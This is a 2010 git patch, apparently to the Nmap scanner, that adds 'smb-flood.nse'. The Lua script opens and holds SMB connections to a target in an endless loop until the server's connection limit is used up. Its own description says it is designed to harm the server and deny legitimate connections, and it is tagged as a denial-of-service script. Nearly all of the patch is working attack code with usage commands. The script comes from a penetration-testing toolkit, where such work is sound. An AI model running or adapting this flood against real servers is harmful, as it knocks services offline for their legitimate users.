From 3cc225753099b18d7daf631df13e7cf3bbc4252d Mon Sep 17 00:00:00 2001 From: ron Date: Sun, 3 Oct 2010 23:02:39 +0000 Subject: [PATCH] Added a new smb script: smb-flood.nse. This denial-of-service script attempts to open too many SMB connections to the server, which can deny legitimate connections from being established. --- scripts/smb-flood.nse | 53 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 scripts/smb-flood.nse diff --git a/scripts/smb-flood.nse b/scripts/smb-flood.nse new file mode 100644 index 000000000..edd7a8330 --- /dev/null +++ b/scripts/smb-flood.nse @@ -0,0 +1,53 @@ +description = [[ +Exhaust the limit of SMB connections on a remote server by opening as many as we can. +Most implementations of SMB have a hard global limit of 11 connections for user accounts +and 10 connections for anonymous. Once that limit is exhausted, further connections +are denied. This exploits that limit by taking up all the connections and holding them. + +This works better with a valid user account, because Windows reserves one slot for valid +users. So, no matter how many anonymous connections are taking up spaces, a single valid +user can still log in. + +This is *not* recommended as a general purpose script, because a) it is designed to harm +the server and has no useful output, and b) it never ends (until timeout). +]] + +--- +-- @usage +-- nmap --script smb-flood.nse -p445 +-- sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139 +-- +-- @output +-- n/a +----------------------------------------------------------------------- + + + +author = "Ron Bowes" +copyright = "Ron Bowes" +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"intrusive","dos"} +dependencies = {"smb-brute"} + +require 'smb' +require 'stdnse' + +hostrule = function(host) + return smb.get_port(host) ~= nil +end + +action = function(host) + local states = {} + repeat + local status, result = smb.start_ex(host, true, true) + if(status) then + table.insert(states, result) -- Keep the result so it doesn't get garbage cleaned + stdnse.print_debug(1, "smb-flood: Connection successfully opened") + stdnse.sleep(.1) + else + stdnse.print_debug(1, "smb-flood: Connection failed: %s", result) + stdnse.sleep(1) + end + until false +end +